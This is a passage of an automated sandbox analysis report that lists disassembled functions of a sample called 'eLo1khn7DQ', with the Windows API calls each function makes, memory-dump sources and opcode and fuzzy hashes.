RegCloseKey.ADVAPI32(00000000), ref: 0027BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0027BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0027BDF3
RegCloseKey.ADVAPI32(?), ref: 0027BDFF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 7d96e5386f0c46eb7f35559b12a5d0a057b9773b08f3b8339ac74f7341a27b12
Instruction ID: 0ab19b6bb1e2d2c146a4152741d5b8db43c7efb4b99b279044f3bbb5be7fac05
Opcode Fuzzy Hash: 7d96e5386f0c46eb7f35559b12a5d0a057b9773b08f3b8339ac74f7341a27b12
Instruction Fuzzy Hash: 36819C70228241AFC715DF24C885F2ABBE5FF84308F14896DF5598B2A2DB31ED55CB92

Function 0024F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0024F7B9
SysAllocString.OLEAUT32(00000001), ref: 0024F860
VariantCopy.OLEAUT32(0024FA64,00000000), ref: 0024F889
VariantClear.OLEAUT32(0024FA64), ref: 0024F8AD
VariantCopy.OLEAUT32(0024FA64,00000000), ref: 0024F8B1
VariantClear.OLEAUT32(?), ref: 0024F8BB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 02d2f0549fd4cb73cb262aa080eb885e745f27f70b2e96dbc08a9ad16f9a0549
Instruction ID: 8cc76892071084eb359945a10fdd7d3fe034e3e53d537dd4a6f4be982ee4aad1
Opcode Fuzzy Hash: 02d2f0549fd4cb73cb262aa080eb885e745f27f70b2e96dbc08a9ad16f9a0549
Instruction Fuzzy Hash: 7551E935A30310BACFA8AF65D995B39B3E4EF85310F248467E905DF292DBB08C50CB56

Function 0026910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 001F7620: _wcslen.LIBCMT ref: 001F7625

Part of subcall function 001F6B57: _wcslen.LIBCMT ref: 001F6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 002694E5
_wcslen.LIBCMT ref: 00269506
_wcslen.LIBCMT ref: 0026952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00269585

Strings

X, xrefs: 00269412

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 8a3365c3d24925142a5cf649bdc0effdbfe0ec7a74d52ee4833e8f63129eae73
Instruction ID: 9e514cd6519cfcb374fa1e743a0cc7680eba85f5e9308ffcb48a2f937061a101
Opcode Fuzzy Hash: 8a3365c3d24925142a5cf649bdc0effdbfe0ec7a74d52ee4833e8f63129eae73
Instruction Fuzzy Hash: AFE1C171518341CFC724EF24C881B6AB7E8BF95314F04896DF9899B2A2DB30DD95CB92

Function 0020920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00209BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00209BB2

BeginPaint.USER32(?,?,?), ref: 00209241
GetWindowRect.USER32(?,?), ref: 002092A5
ScreenToClient.USER32(?,?), ref: 002092C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002092D3
EndPaint.USER32(?,?,?,?,?), ref: 00209321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002471EA

Part of subcall function 00209339: BeginPath.GDI32(00000000), ref: 00209357

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 569accbaedbef7e793b9a725eeecc9071f1377ef32b7c3447b28a83ac5d5ad39
Instruction ID: 52df31ce76c15f8576bc7020720756d73f4e1203ddabac31e37f5c07978910cb
Opcode Fuzzy Hash: 569accbaedbef7e793b9a725eeecc9071f1377ef32b7c3447b28a83ac5d5ad39
Instruction Fuzzy Hash: 0641AF30115301AFD710DF24DC89FAA7BA8EF86320F140669F969871E3C77198A5DF61

Function 002607EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0026080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00260847
EnterCriticalSection.KERNEL32(?), ref: 00260863
LeaveCriticalSection.KERNEL32(?), ref: 002608DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002608F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00260921

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 271634c176af0d1d77a0e0b64db423e8fa0d2a7da55594cf56039458aa8e500c
Instruction ID: 5c1d52294393a95616a312466b207e4087400cc92601f3751308f37bcf6776b6
Opcode Fuzzy Hash: 271634c176af0d1d77a0e0b64db423e8fa0d2a7da55594cf56039458aa8e500c
Instruction Fuzzy Hash: 53417771910205EBDF14EF54ECC5AAA77B9FF04710F1040A9ED049A29BDB30DEA4DBA0

Function 002881DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0024F3AB,00000000,?,?,00000000,?,0024682C,00000004,00000000,00000000), ref: 0028824C
EnableWindow.USER32(00000000,00000000), ref: 00288272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 002882D1
ShowWindow.USER32(00000000,00000004), ref: 002882E5
EnableWindow.USER32(00000000,00000001), ref: 0028830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0028832F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: d4b799cd9ac0bee9f8384b8964af83a52d1dd67517f88951e22d2c7ce4de873a
Instruction ID: e618e7b6c69e3f5ab3cf4ed4054da2ae9dd9fd2d62a5bf52a2080dc8f7e765fe
Opcode Fuzzy Hash: d4b799cd9ac0bee9f8384b8964af83a52d1dd67517f88951e22d2c7ce4de873a
Instruction Fuzzy Hash: CB41C83C602645AFDB25EF14D899FE47BE0FB46714F5841A5E9088B2E3C7316861CF50

Function 00254C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00254C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00254CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00254CEA
_wcslen.LIBCMT ref: 00254D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00254D10
_wcsstr.LIBVCRUNTIME ref: 00254D1A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: b702145f43655f05a266facabacf03c1404d67e6b4c1bc75aeb21620a3c4772c
Instruction ID: cd13923468bfed49aa5258f9f69d4c01871b112399c5390beee6e58d618de5ae
Opcode Fuzzy Hash: b702145f43655f05a266facabacf03c1404d67e6b4c1bc75aeb21620a3c4772c
Instruction Fuzzy Hash: 15210D312152117BEB196F25EC09E7BBBACDF85755F104039FC05CA191EB71DC948760

Function 0026581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 001F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F3A97,?,?,001F2E7F,?,?,?,00000000), ref: 001F3AC2

_wcslen.LIBCMT ref: 0026587B
CoInitialize.OLE32(00000000), ref: 00265995
CoCreateInstance.OLE32(0028FCF8,00000000,00000001,0028FB68,?), ref: 002659AE
CoUninitialize.OLE32 ref: 002659CC

Strings

.lnk, xrefs: 00265876, 002658C1, 00265985

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: fad05af5e738dde55850f1ade178b2caf6844add4b8fc6cef33f09789fb9b18c
Instruction ID: 73b98793ee87052d42e18aff3579f501be65f35920e4d0e130349ea589711d44
Opcode Fuzzy Hash: fad05af5e738dde55850f1ade178b2caf6844add4b8fc6cef33f09789fb9b18c
Instruction Fuzzy Hash: A9D16074618616DFC714DF24C480A2ABBE1FF89714F14885DF88A9B3A1DB31EC85CB92

Function 0025175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00250FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00250FCA
Part of subcall function 00250FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00250FD6
Part of subcall function 00250FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00250FE5
Part of subcall function 00250FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00250FEC
Part of subcall function 00250FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00251002

GetLengthSid.ADVAPI32(?,00000000,00251335), ref: 002517AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002517BA
HeapAlloc.KERNEL32(00000000), ref: 002517C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 002517DA
GetProcessHeap.KERNEL32(00000000,00000000,00251335), ref: 002517EE
HeapFree.KERNEL32(00000000), ref: 002517F5

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 4d8f8372d9c322e940adf80c175466c4d63e73d241d90d13fbb15a67b41aed37
Instruction ID: 017f43026d1fd77eaddabb7435bb855089f73480be0100427535ca8635fc72de
Opcode Fuzzy Hash: 4d8f8372d9c322e940adf80c175466c4d63e73d241d90d13fbb15a67b41aed37
Instruction Fuzzy Hash: 9811D335521205FFDB109FA8DC8DBAFBBB9EF49356F204118F84597110C7359968CB64

Function 002514CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002514FF
OpenProcessToken.ADVAPI32(00000000), ref: 00251506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00251515
CloseHandle.KERNEL32(00000004), ref: 00251520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0025154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00251563

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: eebb6631ee3580a60b3298679adfb709abee8102f808051772f0e7b16e96993a
Instruction ID: d09e2cc92cc71bf72299fd786bbe9b929f08eb4dbda7a1ab9ac2eef96f50e19b
Opcode Fuzzy Hash: eebb6631ee3580a60b3298679adfb709abee8102f808051772f0e7b16e96993a
Instruction Fuzzy Hash: 4F11977610120EABDF118FA8ED09FDE7BA9EF48749F144024FE05A2060D375CE64EB60

Function 00213382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00213379,00212FE5), ref: 00213390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0021339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002133B7
SetLastError.KERNEL32(00000000,?,00213379,00212FE5), ref: 00213409

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 304f19da6f552ead0349f8734d5602e0546778d02599c03341d182e290c81aab
Instruction ID: d327c45ab15b06e86bcadfffc7dc2b488db7b85f7b142aa056c8c72f213ede85
Opcode Fuzzy Hash: 304f19da6f552ead0349f8734d5602e0546778d02599c03341d182e290c81aab
Instruction Fuzzy Hash: 2C012832339312BEA6247F747C895E62ADADB353753300379F420841F4EF214DB25998

Function 00222D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00225686,00233CD6,?,00000000,?,00225B6A,?,?,?,?,?,0021E6D1,?,002B8A48), ref: 00222D78
_free.LIBCMT ref: 00222DAB
_free.LIBCMT ref: 00222DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0021E6D1,?,002B8A48,00000010,001F4F4A,?,?,00000000,00233CD6), ref: 00222DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0021E6D1,?,002B8A48,00000010,001F4F4A,?,?,00000000,00233CD6), ref: 00222DEC
_abort.LIBCMT ref: 00222DF2

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 4a24e192f8e60adfb860425840941c627a9a54f9740c798c0906577cf5493f3f
Instruction ID: 8bafcd873c2f85eeaedf2fc28df53bcfc8175dbffb93916ddfcf0ab513ffad0f
Opcode Fuzzy Hash: 4a24e192f8e60adfb860425840941c627a9a54f9740c798c0906577cf5493f3f
Instruction Fuzzy Hash: 3EF0CD35535531F7C2127BF87C0AE5A1559AFC2761F340528F824921D6DF368C7A4570

Function 00288A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00209639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00209693
Part of subcall function 00209639: SelectObject.GDI32(?,00000000), ref: 002096A2
Part of subcall function 00209639: BeginPath.GDI32(?), ref: 002096B9
Part of subcall function 00209639: SelectObject.GDI32(?,00000000), ref: 002096E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00288A4E
LineTo.GDI32(?,00000003,00000000), ref: 00288A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00288A70
LineTo.GDI32(?,00000000,00000003), ref: 00288A80
EndPath.GDI32(?), ref: 00288A90
StrokePath.GDI32(?), ref: 00288AA0

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 2f3b2ece956dd38ef5d25ed6bcb0964dd7cb6392c0bd73a8d14f3e518571dabb
Instruction ID: 593eafa3cb14867a490d6d80489f538010f3a307bae9fc5344dc633b1eb4395b
Opcode Fuzzy Hash: 2f3b2ece956dd38ef5d25ed6bcb0964dd7cb6392c0bd73a8d14f3e518571dabb
Instruction Fuzzy Hash: 3411DE7600114DFFDF119F94EC88E9A7F6DEB04394F148011BA19991A1C7719D65DF70

Function 002551FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00255218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00255229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00255230
ReleaseDC.USER32(00000000,00000000), ref: 00255238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0025524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00255261

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 9ad1b0e1c997673023df6d17bbf74923643376f67bf1bfdbe8fbff10b1a9a12d
Instruction ID: 3c21017c326c4c6fe217fc7d0abc6bfc421bd462645ec71e368467c47fd9d3d3
Opcode Fuzzy Hash: 9ad1b0e1c997673023df6d17bbf74923643376f67bf1bfdbe8fbff10b1a9a12d
Instruction Fuzzy Hash: D1014F75A01719BBEB109FB5AC49A5EBFB8EF48751F144065FA04E7281DB709C14CFA0

Function 001F1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 001F1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 001F1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001F1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001F1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 001F1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 001F1C22

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: a3cb2ae30f33ca85650afc6836ce15f133bcec5ac96047b56cc93079e5299e7c
Instruction ID: f479dee2e29b0ced9c747cf769dbc9a45426a7fc33a2eb052e643880e3551c79
Opcode Fuzzy Hash: a3cb2ae30f33ca85650afc6836ce15f133bcec5ac96047b56cc93079e5299e7c
Instruction Fuzzy Hash: 10016CB09027597DE3008F5A8C85B52FFA8FF59354F00411B915C47941C7F5A864CBE5

Function 0025EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0025EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0025EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0025EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0025EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0025EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0025EB75

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5b311d44a01868bd8e78e7680c66951d0b473821d48a88186519e4976ee66826
Instruction ID: 4d89499c948f4809d37a24d2178e689eed803e4f838da2167b995ffb4d4cfcfe
Opcode Fuzzy Hash: 5b311d44a01868bd8e78e7680c66951d0b473821d48a88186519e4976ee66826
